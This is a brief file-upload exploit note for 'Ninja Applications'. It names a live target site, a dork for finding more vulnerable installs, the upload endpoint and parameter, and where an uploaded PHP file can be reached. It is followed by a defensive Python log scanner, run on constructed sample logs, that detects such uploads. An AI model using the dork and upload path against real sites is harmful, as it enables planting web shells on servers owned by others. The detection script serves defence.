Ninja Applications Arbitrary File Upload
Live TARGET : https://stickeroid.com/
Dork : inurl:/ninja-applications/fufu/
Exploit : /ninja-applications/fufu/controllers/uploader/upload.php
example : https://stickeroid.com
/ninja-applications/fufu/controllers/uploader/upload.php
Vuln:
{"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
Upload With CSRF
Parameter : "file"
Access your file in : /uploads/temp/randomname.php
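
For site owners checking whether this has been used against them, the following is an added detection example, not part of the original advisory. It scans web server access logs for POSTs to the uploader path above and for requests to script files under /uploads/temp/. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re

# Paths taken from the advisory above.
UPLOAD_ENDPOINT = "/ninja-applications/fufu/controllers/uploader/upload.php"
TEMP_DIR = "/uploads/temp/"
# Extensions treated as server-executable (assumption; adjust to your stack).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "POST /ninja-applications/fufu/controllers/uploader/upload.php HTTP/1.1" 200 71',
    '203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /uploads/temp/randomname.php HTTP/1.1" 200 12',
    '198.51.100.4 - - [10/Mar/2024:12:01:00 +0000] "GET /uploads/temp/photo.png HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Mar/2024:12:02:00 +0000] "GET /uploads/temp/x.phtml HTTP/1.1" 404 0',
]

def find_suspicious(lines):
    """Return (kind, ip, path, status) for uploader POSTs and temp-dir script requests."""
    findings = []
    uploaders = set()  # client IPs already seen POSTing to the upload endpoint
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            uploaders.add(ip)
            findings.append(("upload_post", ip, path, status))
        elif TEMP_DIR in path and SCRIPT_EXT.search(path):
            # A 200 means the server handed back (and likely executed) the script.
            kind = "script_served" if status == 200 else "script_probe"
            if ip in uploaders:
                kind += "_after_upload"
            findings.append((kind, ip, path, status))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

Any `script_served` finding means the temp directory is serving script files; removing the uploader or disabling script execution for /uploads/temp/ in the web server configuration closes that path.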